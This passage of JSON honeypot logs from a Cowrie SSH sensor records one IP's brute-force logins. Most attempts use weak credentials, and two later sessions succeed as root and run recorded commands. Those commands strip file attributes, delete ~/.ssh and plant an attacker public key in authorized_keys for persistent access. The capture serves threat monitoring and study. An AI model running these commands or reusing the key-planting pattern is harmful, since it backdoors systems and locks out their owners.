k-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:09:49.528837Z","src_ip":"212.227.235.229","session":"f3e78b12678b"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:09:50.524187Z","src_ip":"212.227.235.229","session":"f3e78b12678b"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:09:51.783845Z","src_ip":"212.227.235.229","session":"f3e78b12678b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56484,"dst_ip":"1.2.3.4","dst_port":22,"session":"d44712dc3167","protocol":"ssh","message":"New connection: 212.227.235.229:56484 (1.2.3.4:22) [session: d44712dc3167]","sensor":"my-vps","timestamp":"2025-09-08T23:09:52.011191Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:09:52.030572Z","src_ip":"212.227.235.229","session":"d44712dc3167"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:09:52.272031Z","src_ip":"212.227.235.229","session":"d44712dc3167"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:09:53.291620Z","src_ip":"212.227.235.229","session":"d44712dc3167"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:09:53.526712Z","src_ip":"212.227.235.229","session":"d44712dc3167"}
{"eventid":"cowrie.session.closed","duration":"7.3","message":"Connection lost after 7.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:09:53.527581Z","src_ip":"212.227.235.229","session":"7e468efe46a5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35000,"dst_ip":"1.2.3.4","dst_port":22,"session":"5b9cb57c0074","protocol":"ssh","message":"New connection: 212.227.235.229:35000 (1.2.3.4:22) [session: 5b9cb57c0074]","sensor":"my-vps","timestamp":"2025-09-08T23:09:56.862252Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:09:56.863173Z","src_ip":"212.227.235.229","session":"5b9cb57c0074"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:09:57.173013Z","src_ip":"212.227.235.229","session":"5b9cb57c0074"}
{"eventid":"cowrie.login.failed","username":"public","password":"111","message":"login attempt [public/111] failed","sensor":"my-vps","timestamp":"2025-09-08T23:09:58.453237Z","src_ip":"212.227.235.229","session":"5b9cb57c0074"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:09:59.765481Z","src_ip":"212.227.235.229","session":"5b9cb57c0074"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54642,"dst_ip":"1.2.3.4","dst_port":22,"session":"346f81352e90","protocol":"ssh","message":"New connection: 212.227.235.229:54642 (1.2.3.4:22) [session: 346f81352e90]","sensor":"my-vps","timestamp":"2025-09-08T23:10:22.951928Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:10:22.953228Z","src_ip":"212.227.235.229","session":"346f81352e90"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:10:23.091276Z","src_ip":"212.227.235.229","session":"346f81352e90"}
{"eventid":"cowrie.login.failed","username":"gpadmin","password":"1234567890","message":"login attempt [gpadmin/1234567890] failed","sensor":"my-vps","timestamp":"2025-09-08T23:10:23.688371Z","src_ip":"212.227.235.229","session":"346f81352e90"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:10:24.829727Z","src_ip":"212.227.235.229","session":"346f81352e90"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37064,"dst_ip":"1.2.3.4","dst_port":22,"session":"3c37b9ebf7ab","protocol":"ssh","message":"New connection: 212.227.235.229:37064 (1.2.3.4:22) [session: 3c37b9ebf7ab]","sensor":"my-vps","timestamp":"2025-09-08T23:10:35.653832Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:10:35.654576Z","src_ip":"212.227.235.229","session":"3c37b9ebf7ab"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:10:35.749681Z","src_ip":"212.227.235.229","session":"3c37b9ebf7ab"}
{"eventid":"cowrie.login.failed","username":"test2","password":"qwerty","message":"login attempt [test2/qwerty] failed","sensor":"my-vps","timestamp":"2025-09-08T23:10:36.169389Z","src_ip":"212.227.235.229","session":"3c37b9ebf7ab"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:10:37.267571Z","src_ip":"212.227.235.229","session":"3c37b9ebf7ab"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43596,"dst_ip":"1.2.3.4","dst_port":22,"session":"ea513e811b86","protocol":"ssh","message":"New connection: 212.227.235.229:43596 (1.2.3.4:22) [session: ea513e811b86]","sensor":"my-vps","timestamp":"2025-09-08T23:10:41.217679Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:10:41.218454Z","src_ip":"212.227.235.229","session":"ea513e811b86"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:10:41.529702Z","src_ip":"212.227.235.229","session":"ea513e811b86"}
{"eventid":"cowrie.login.success","username":"root","password":"Hetzner123#","message":"login attempt [root/Hetzner123#] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:10:43.221725Z","src_ip":"212.227.235.229","session":"ea513e811b86"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:10:44.766025Z","src_ip":"212.227.235.229","session":"ea513e811b86"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:10:44.766921Z","src_ip":"212.227.235.229","session":"ea513e811b86"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:10:44.768022Z","src_ip":"212.227.235.229","session":"ea513e811b86"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:10:45.078946Z","src_ip":"212.227.235.229","session":"ea513e811b86"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:10:45.808852Z","src_ip":"212.227.235.229","session":"ea513e811b86"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:10:45.809596Z","src_ip":"212.227.235.229","session":"ea513e811b86"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:10:46.121878Z","src_ip":"212.227.235.229","session":"ea513e811b86"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:10:46.122747Z","src_ip":"212.227.235.229","session":"ea513e811b86"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58520,"dst_ip":"1.2.3.4","dst_port":22,"session":"be2c7f2977b5","protocol":"ssh","message":"New connection: 212.227.235.229:58520 (1.2.3.4:22) [session: be2c7f2977b5]","sensor":"my-vps","timestamp":"2025-09-08T23:10:46.145277Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:10:46.145850Z","src_ip":"212.227.235.229","session":"be2c7f2977b5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57374,"dst_ip":"1.2.3.4","dst_port":22,"session":"cc961fb01e2f","protocol":"ssh","message":"New connection: 212.227.235.229:57374 (1.2.3.4:22) [session: cc961fb01e2f]","sensor":"my-vps","timestamp":"2025-09-08T23:10:46.425094Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:10:46.432464Z","src_ip":"212.227.235.229","session":"cc961fb01e2f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:10:46.486958Z","src_ip":"212.227.235.229","session":"be2c7f2977b5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:10:46.738292Z","src_ip":"212.227.235.229","session":"cc961fb01e2f"}
{"eventid":"cowrie.login.success","username":"root","password":"april","message":"login attempt [root/april] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:10:47.894897Z","src_ip":"212.227.235.229","session":"be2c7f2977b5"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:10:48.456802Z","src_ip":"212.227.235.229","session":"cc961fb01e2f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:10:48.637312Z","src_ip":"212.227.235.229","session":"be2c7f2977b5"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:10:48.638115Z","src_ip":"212.227.235.229","session":"be2c7f2977b5"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:10:48.639235Z","src_ip":"212.227.235.229","session":"be2c7f2977b5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:10:48.981577Z","src_ip":"212.227.235.229","session":"be2c7f2977b5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:10:49.680600Z","src_ip":"212.227.235.229","session":"be2c7f2977b5"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:10:49.681349Z","src_ip":"212.227.235.229","session":"be2c7f2977b5"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:10:49.765321Z","src_ip":"212.227.235.229","session":"cc961fb01e2f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:10:50.025059Z","src_ip":"212.227.235.229","session":"be2c7f2977b5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:10:50.025961Z","src_ip":"212.227.235.229","session":"be2c7f2977b5"}
